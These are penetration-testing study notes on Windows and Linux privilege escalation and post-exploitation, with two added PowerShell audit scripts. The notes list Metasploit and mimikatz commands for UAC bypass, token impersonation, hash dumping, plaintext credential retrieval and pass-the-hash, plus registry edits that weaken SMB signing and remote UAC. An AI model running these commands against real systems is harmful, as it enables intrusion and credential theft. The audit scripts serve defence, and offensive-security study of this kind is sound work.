Lateral Priv Esc: Elevating to higher privileges
Horizontal Priv Esc: Maintaining same privileges but a different identity
Access should be stable, privileged, and persistent.
Stable:
Migrating to a new process after initial access. Why? If the user closes a web browser/other process we are running under, we will lose our session.
From meterpreter:
ps
migrate <pid>
Persistence:
Typically requires elevated privileges.
exploit/<OS>/local
for local exploits in metasploit
Checking for UAC on Windows host:
post/windows/gather/win_privs
= UAC Enabled column will indicate the UAC status
search bypassuac
use <Exploit>
set SESSION #
run post/windows/gather/win_privs
to verify bypassuac worked
getsystem
may succeed after elevating to higher privileges
getuid
provides the current user id; can check to ensure getsystem worked
Incognito: Allows a SYSTEM user to access local user tokens in memory and utilize them for authentication.
use incognito
list_tokens -u
impersonate_token <token>
Unquoted Service Path
Discovering an unquoted path to a service binary.
Inserting a malicious executable into the unquoted path will make Windows execute the program; this requires you have the correct permissions to write to a folder within the path.
Search for unquoted service path using wmic:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Search for unquoted service path manually with sc:
sc qc <ServiceName>
Metasploit Module:
use exploit/windows/local/trusted_service_path
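Added example (not from the original notes, and not part of Metasploit): a PowerShell audit that does what the wmic one-liner above does, then goes further by reporting which of the directories Windows would search for a truncated path are writable by low-privilege groups, and optionally quotes the ImagePath in place. The -Fix switch, the $LowPrivPrincipals list and the function names are this script's own assumptions.

```powershell
# Audit services with an unquoted ImagePath containing spaces. Run elevated.
# -Fix rewrites ImagePath in the registry with the executable path quoted.
param([switch]$Fix)

# Principals that should never hold write access on a service binary's search path (assumed list)
$LowPrivPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-WritableSearchDir {
    param([string]$Exe)
    # Every space in the path yields a truncated candidate (C:\Program, C:\Program Files\My, ...);
    # the parent directory of each candidate is where a planted binary would have to live.
    $dirs = @()
    $idx = $Exe.IndexOf(' ')
    while ($idx -ge 0) {
        $dirs += Split-Path -Parent $Exe.Substring(0, $idx)
        $idx = $Exe.IndexOf(' ', $idx + 1)
    }
    foreach ($d in ($dirs | Sort-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $d)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $d).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if ($ace.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles') { $d; break }
        }
    }
}

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path.TrimStart().StartsWith('"')) { return }   # already quoted
        # Keep only the executable portion; anything after ".exe" is arguments
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path }
        if ($exe -notmatch ' ') { return }                  # no space, no ambiguity
        if ($exe -like 'C:\Windows\*') { return }            # same filter the wmic one-liner applies
        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            RunAs     = $_.StartName
            ImagePath = $exe
            Writable  = (Get-WritableSearchDir $exe) -join ';'   # non-empty means exploitable as-is
        }
    }
}

function Repair-UnquotedServicePath {
    param([string]$Name)
    # Registry ImagePath may differ from Win32_Service.PathName (env vars, \??\ prefix), so re-read it here
    $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $path = (Get-ItemProperty -LiteralPath $key).ImagePath
    $m = [regex]::Match($path, '^(.*?\.exe)(.*)$', 'IgnoreCase')
    if (-not $m.Success) { return }
    $fixed = '"' + $m.Groups[1].Value + '"' + $m.Groups[2].Value
    Set-ItemProperty -LiteralPath $key -Name ImagePath -Value $fixed
    "$Name -> $fixed"
}

$findings = Get-UnquotedServicePath
$findings | Format-Table -AutoSize
if ($Fix) { $findings | ForEach-Object { Repair-UnquotedServicePath $_.Name } }
```

Services whose Writable column is empty are only latent findings (the path is unquoted but nobody low-privileged can plant a file); those with a directory listed are the ones to fix first, either with -Fix or by tightening the ACL on that directory.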
Identifying OS/Applications running:
Meterpreter:
sysinfo
getuid
run post/linux/gather/enum_system
Compiling publicly available exploits on Linux:
Upload the source code to the target using upload...etc.
Compile code: gcc <SourceCode> -o <OutputFile>
Run the exploit: ./<Exploit>
Compile 32bit exploit on a 64bit system with gcc:
gcc -m32 -o <OutputFile> <SourceCode>
Then upload the file and run it.
Replace DLLs or executables with malicious ones.
Shellter Obfuscation: https://www.shellterproject.com/introducing-shellter/
Dumping Hashes:
Using Meterpreter: run hashdump
Pass the Hash with psexec:
use exploit/windows/smb/psexec
best to do with administrative credentials
If using a user that is part of the administrators group but has a RID in the 500s, you may need to make registry changes to allow pass-the-hash.
Registry Key to allow local users to pass the hash:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
AND
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 0 /f
PTH with xfreerdp:
xfreerdp /u:<User> /d:<DomainName> /pth:<HASH> /v:<TargetIP>
https://github.com/gentilkiwi/mimikatz/wiki
ps -A <Architecture> -s
= List processes running as SYSTEM
migrate <PID>
load mimikatz
wdigest
= Attempts to retrieve plaintext passwords
Enabling RDP
Check for all enabled services:
net start
With wmic:
wmic service where 'Caption like "Remote%" and started=true' get Caption
With meterpreter:
run post/windows/gather/enum_services
ENABLING RDP:
run getgui -h
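Added example (not from the original notes): a read-only PowerShell audit of the host settings these notes depend on, i.e. the UAC state checked by win_privs, the two registry values the pass-the-hash section sets, the WDigest caching that the mimikatz wdigest command relies on, and whether RDP is enabled and running. The Expect and Default values are this script's assumptions about a hardened host; adjust them where RDP is intentionally enabled.

```powershell
# Hardening audit for the settings referenced in the notes above. Run elevated.
# Default = the value Windows uses when the registry value is absent (assumed).
$Checks = @(
    @{ Name = 'UAC enabled (EnableLUA)'
       Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
       Value = 'EnableLUA'; Expect = 1; Default = 1 },
    @{ Name = 'Remote UAC token filtering (LocalAccountTokenFilterPolicy, 1 = local admins can PTH)'
       Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
       Value = 'LocalAccountTokenFilterPolicy'; Expect = 0; Default = 0 },
    @{ Name = 'SMB server signing required (RequireSecuritySignature)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
       Value = 'RequireSecuritySignature'; Expect = 1; Default = 0 },
    @{ Name = 'WDigest plaintext caching (UseLogonCredential, 1 = plaintext in LSASS)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Value = 'UseLogonCredential'; Expect = 0; Default = 0 },   # older than 8.1/2012 R2 defaults to 1
    @{ Name = 'RDP connections denied (fDenyTSConnections)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
       Value = 'fDenyTSConnections'; Expect = 1; Default = 1 },
    @{ Name = 'RDP requires NLA (UserAuthentication)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
       Value = 'UserAuthentication'; Expect = 1; Default = 1 }
)

function Test-HardeningSetting {
    foreach ($c in $Checks) {
        $actual = $c.Default
        if (Test-Path -LiteralPath $c.Path) {
            $item = Get-ItemProperty -LiteralPath $c.Path -Name $c.Value -ErrorAction SilentlyContinue
            if ($null -ne $item) { $actual = $item.($c.Value) }
        }
        $status = if ($actual -eq $c.Expect) { 'OK' } else { 'REVIEW' }
        [pscustomobject]@{ Setting = $c.Name; Actual = $actual; Expected = $c.Expect; Status = $status }
    }
    # Service state for the RDP service that "net start" would list as Remote Desktop Services
    $svc = Get-Service -Name TermService -ErrorAction SilentlyContinue
    $running = $svc -and $svc.Status -eq 'Running'
    $status = if ($running) { 'REVIEW' } else { 'OK' }
    [pscustomobject]@{ Setting = 'TermService (RDP) running'; Actual = $(if ($svc) { $svc.Status } else { 'absent' }); Expected = 'Stopped'; Status = $status }
}

Test-HardeningSetting | Format-Table -AutoSize
```

A REVIEW on LocalAccountTokenFilterPolicy or RequireSecuritySignature means the exact registry changes from the pass-the-hash section have been applied on this host, which is worth investigating as a persistence indicator rather than just a misconfiguration.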
run post/windows/gather/
run post/linux/gather/
run post/gather/credentials/
Search victim browser history for internal corporate websites/network information.